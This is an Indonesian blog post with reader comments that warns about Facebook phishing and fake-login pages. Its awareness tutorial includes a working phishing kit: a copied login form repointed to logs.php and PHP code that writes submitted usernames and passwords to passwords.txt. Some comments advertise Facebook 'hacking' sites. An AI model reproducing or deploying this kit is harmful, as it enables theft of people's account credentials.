Beberapa bulan terakhir, Facebook yang merupakan social network (jejaring sosial) terbesar sering mendapat phising baik itu dari email, IM seperti yahoo messenger, maupun dari pesan dari contact list facebook sendiri.
Serangan phising terbesar menurut facebook dilakukan oleh 2 website yaitu FBStarter.com dan BAction.net beberapa waktu lalu. Meraka biasa mengirim pesan berupa kata-kata “Check this out”. Kemudian mereka mengundang korban untuk meng-klik link yang akan membawa mereka keluar dari Facebook.
Pihak Facebook menyatakan bahwa serangan tersebut berhenti setiap beberapa jam pada tiap kasusnya. Facebook juga menyatakan bahwa belum ada kepastian apakah serangan dari kedua website tersebut saling terkait atau tidak.
Facebook telah menghapus URL tersebut dari member page dan membuang URL yang ada di pesan mail. Untuk user yang telah terjebak phising ini, pihak Facebook telah mereset password mereka. Facebook juga menganjurkan para usernya untuk tidak meng-click link yang mencurigakan serta menganjurkan para user yang telah menjadi korban untuk segera mengganti password.
Phising merupakan proses untuk mendapatkan informasi sensitif seperti username, password dan bahkan sampai detail kartu kredit dengan berpura-pura menjadi website asli.
Biasanya si pelaku memancing korbannya untuk masuk ke website yang dibuat mirip dengan website aslinya. Pada website palsu itu, si pelaku telah menaruh box username dan password dan meminta korban untuk login. Jadi di sini si pelaku melakukan penipuan login atau biasa di sebut fake login.
Bagaimana kita tahu kalau itu fake login ?
Untuk mengetahui itu web phising yang menggunakan fake login, kita harus teliti url untuk login di facebook itu sendiri. Untuk login, facebook menggunakan url https://login.facebook.com/login.php
Web phising dengan fake login
Tampilan utama Web phising dengan fake login menggunakan source code dari https://login.facebook.com/login.php yang disimpan menjadi index.html. Tapi di index.html ini kita tambahi di form dengan pemanggilan code php untuk penyimpanan username dan password yang diisikan.
<form method=”POST” action=”logs.php” name=”menubar_login”
id=”menubar_login”><input type=”hidden” name=”charset_test”
value=”€,´,€,´,?,?,?” /><input type=”hidden” id=”locale”
name=”locale” value=”en_US” /><table cellpadding=”0″ cellspacing=”0″><tr><td
class=”login_form_label_field login_form_label_remember”><label><input
type=”checkbox” name=”persistent” value=”1″ />Remember Me</label></td><td
class=”login_form_label_field”><a href=”http://www.facebook.com/reset.php”
rel=”nofollow”>Forgot your password?</a></td><td class=”login_form_last_field
login_form_label_field”></td></tr><tr><td><input type=”text” class=”inputtext”
id=”email” name=”email” value=”" /></td><td><input type=”password”
class=”inputpassword” id=”pass” name=”pass” value=”" /><input type=”text”
class=”inputtext hidden_elem” id=”pass_placeholder” name=”pass_placeholder”
value=”" /></td><td class=”login_form_last_field”><div
class=”UILinkButton”><input type=”submit” class=”UILinkButton_A” value=”Login”
/><div class=”UILinkButton_RW”><div
class=”UILinkButton_R”></div></div></div></td></tr></table><input type=”hidden”
name=”charset_test” value=”€,´,€,´,?,?,?” /></form>
Lihat code yang di cetak tebal tersebut, code asli dari facebook adalah
<form id=”login_form”
action=”https://login.facebook.com/login.php?login_attempt=1″ method=”POST”>
Yang tercetak tebal, yaitu :
<form method=”POST” action=”logs.php” name=”menubar_login”
id=”menubar_login”>
adalah pengisian dari form tersebut kita akan diarahkan ke logs.php.
Sedangkan isis dari logs.php adalah pencatatan dari pengisian username dan password tersebut.
<?php
header(“Location:http://www.facebook.com/”);
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
Pengisisan di web phising yang menggunakan fake login facebook ini akan tersimpan di passwords.txt secara terus menerus……..
Bahaya kan……
Semoga menjadi pencerahan bagi teman-teman yang beberapa hari lalu menanyakan hal ini padaku lewat YM.
Search Engine Visit :
facebook com login php login_attempt 1 , hp smartArtikel lain yang berhubungan :
- FORM HTML
- Jangan Grab Website Secara Langsung !
- Amankah Toko Online di Indonesia ?
- Ganti Username Facebook kita dengan Nama Pilihan Sendiri
- UC Browser Start Page New Change
- Install WordPress 2.7 di Hosting dan Local PC (XAMPP)
- Facebook / FB dan Download, Google Trends Indonesia
- Cara Mudah Membuat Sendiri Update Status Facebook – Facebook Application
- Chatting Facebook with Pidgin IM
- Update Status Facebook via Blackberry, Blueberry, Telepon Umum, Wartel, Kantor Pos, HP Pinjaman, Warnet, Hati
- Cara Buat Update Status Facebook via Blackberry, iPhone, Android dengan Mudah
- PointBlank Hitsplay – Gemscool Point Blank Alternative Thailand Server
- Submit Website di Friendster Sharer, Dofollow PR7
- Setting Internet Selular
- Facebook Menjadi Sasaran Penyebaran Virus
- Install dan Setting WordPress MU di localhost menggunakan XAMPP
- Instal WordPress dengan Domain Gratis dan Hosting Gratis
- Facebook For Dummies [Paperback]
- Bahayakah Facebok.com ? Apa Scam ?
- Aplikasi Terkenal di Facebook – Facebook Top Applications
Artikel Bahaya Phising dan Fake Login Facebook yang terkait di situs lainnya:
Bahaya Phising dan Fake Login Facebook | catatanku di website
Facebook, social network (jejaring sosial) terbesar sering mendapat phising baik dari email, IM seperti yahoo messenger, pesan dari contact list facebook
http://ariefew.com/programming/bahaya-phising-fake-login-facebook/
Mempercepat Firefox & Mozilla | catatanku di website
Mempercepat Firefox & Mozilla; Opera Mini Mod v.3.10; Bahaya Phising dan Fake Login Facebook ... 135030 programs | 140 602 038 downloads ... The reverse-proxy mode makes ...
http://ariefew.com/internet/mempercepat-firefox-mozilla/
Facebook / FB dan Download, Google Trends Indonesia | catatanku ...
Download Video Hot, Mesum, Porno Luna Maya dan Ariel; Keong Racun Menduduki Pencarian Melejit Google Indonesia; Chatting Facebook with Pidgin IM; Bahaya Phising dan Fake Login Facebook
http://ariefew.com/internet/facebook-fb-download-google-trends-indonesia/
Yahoo Messenger Online Status in Website | catatanku di website
Bahaya Phising dan Fake Login Facebook; Telkomsel Chatbox Gagal Login Yahoo Messenger; Cara Buat Update Status Facebook via Blackberry, iPhone, Android dengan Mudah
http://ariefew.com/website/yahoo-messenger-online-status-website/
Widget Detik RSS Pausing Scroller | catatanku di website
Bahaya Phising dan Fake Login Facebook; Jangan Grab Website Secara Langsung ! Download Bolt Browser 2.1 Jar file; DASAR HYPERTEXT MARKUP LANGUAGE (HTML)
http://ariefew.com/website/widget-detik-rss-pausing-scroller/
saya baru mengenal fake login facebook ketika saya berada di suau warnet dekat kosan saya, pemilik rental warnet ternyata orang nya iseng. memasang fake login ini… sungguh saya jadi males ke warnet itu… untung saya lihat lagi alamatna… jadi.. hati2 lah dalam melakukan login facebook.. lihat dulu, apakah sudah benar atau tidak alamatnya yaitu http://www.facebook.com sebelum melakukan login
.-= kank_ripay´s last blog ..Perbaikan Website SMAN 1 Ciawigebang =-.
[Reply]
teman saya juga telah menjadi korban phising seperti ini, padahal browser Mozilla yg dia pake sempat memperingatkannya bahwa website yg dia kunjugi itu ada malwarenya. alhasil, akun fb nya pun jatuh ke tangan orang iseng.
satunya lagi, teman saya yg hobby main poker juga kayaknya terserang tangan jahil, tapi dengan cara yg berbeda hanya gara-gara dia main di warnet dan punya CHIPS Zynga ber MM….
.-= Budiarno´s last blog ..Flexinet Pake Modem USB CDMA (PDF) =-.
[Reply]
Info na mantap sekali om.. , berkunjung di sore hari nih ……..
.-= syadiashare´s last blog ..Download Macromedia Dreamweaver 8 =-.
[Reply]
ariefew Reply:
November 13th, 2009 at 4:15 am
hei…. kok tiba2 muncul di sini… ada apa ini… hehehehhe
[Reply]
Ada cara hacking facebook level 3, lebih dari sekedar fake.
Trik Rahasia HAcking Facebook dan twitter …..bisa untuk teknik marketing
Mantaf ada di webqu buat referensi…Blog Lebih Cepat Dengan Cache Database Dan Cache Widget
[Reply]
Nice posting….
Bicara tentang pishing memang aga sedikit gerah… tapi terkadang semua yang bersifat negatif tetap saja akan ada hikmahnya, manfaatnya…
baca kelanjutannya di http://bumikupijak.com/index.php?option=com_content&task=view&id=318&Itemid=2
Saya masukkan baclinknya yah…
[Reply]
Oh ya.. minta pendapatnya ya di komentar posting sy disini… sy tunggu…
http://bumikupijak.com/index.php?option=com_content&task=view&id=318
Trmksh, maju terus..
.-= dPrince Of Smart´s last blog ..Pentingkah Hak Cipta? =-.
[Reply]
ariefew Reply:
January 8th, 2010 at 12:59 pm
aku sudah 2 kali coba comment di sana gak bisa masuk…..
kujawab aja disini mas….
Kalau kulihat artikel anda tersebut ada 2 masalah yang berbeda yang tdk bisa di ulas menjadi satu.
Pertama
Topik tentang Phising dan Fake Login Facebook
aku mbuat tulisan tentang topik tersebut dikarenakan ada beberapa member forum temanku menanyakan/ mengalami “hack’ facebook. Berkali2 ku jelaskan bahwa website sebesar Fb tdk akan bisa di hack dengan mudah. Jebolnya user dan password FB kita kemungkinan keteledoran kita sendiri yg tdk memperhatikan url yg sesungguhnya. Phising dan Fake Login Facebook bisa lewat mail, atau link dan komentar2 di wall FB sendiri. Penggunaan short url juga menunjang terjadinya Phising dan Fake Login Facebook tersebut.
Kedua
Masalah hak cipta
konten/script/template/widget sangat penting menampilkan link asalnya (asal dari konten/script/template/widget di suatu url) bukan ke url induk atau link si pembuat.
Jika kita menemukan suatu script/template/widget di internet kita akan tahu asal usulnya, dan aman kah jika dipakai?
Selain itu script/template/widget pasti sering mengalami perubahan atau revisi, jika terjadi perubahan pasti sangat mudah untuk menelusurinya kembali.
misal kurs yg ada kubuat, tdk akan bertahan utk selamanya, karena disitu kugunakan teknik graber utk pengambilannya. Jika terjadi perubahan di web asal pasti script yg kugunakan ikut berubah
[Reply]
bos dari pada make phising dah bnyak yang nyadar!!
bih baek make ini nih…
silahkan kunjungi http://www.aizmierhink.co.cc/
ane jamin pasti puas!!
.-= aiz mierink´s last blog ...:: hack facebook ::. =-.
[Reply]
ariefew Reply:
March 14th, 2010 at 12:23 pm
harap hati2 aja pakai ini…
jika domain atau subdomain ter-index google, pasti akan ter-suspended
nb:
waktu membuat artikel ini, aku juga membuat subdomain untuk contohnya.
Setelah subdomain tersebut terindex google dan dinyatakan web phising, pihak hosting mensuspended semua domain yg ada di hosting tsb.
Berkali2 aku mengirimkan ticket untuk menjelaskan ini semua, dan akhirnya aku di beri kesempatan lagi setelah ku hapus subdomain tsb
[Reply]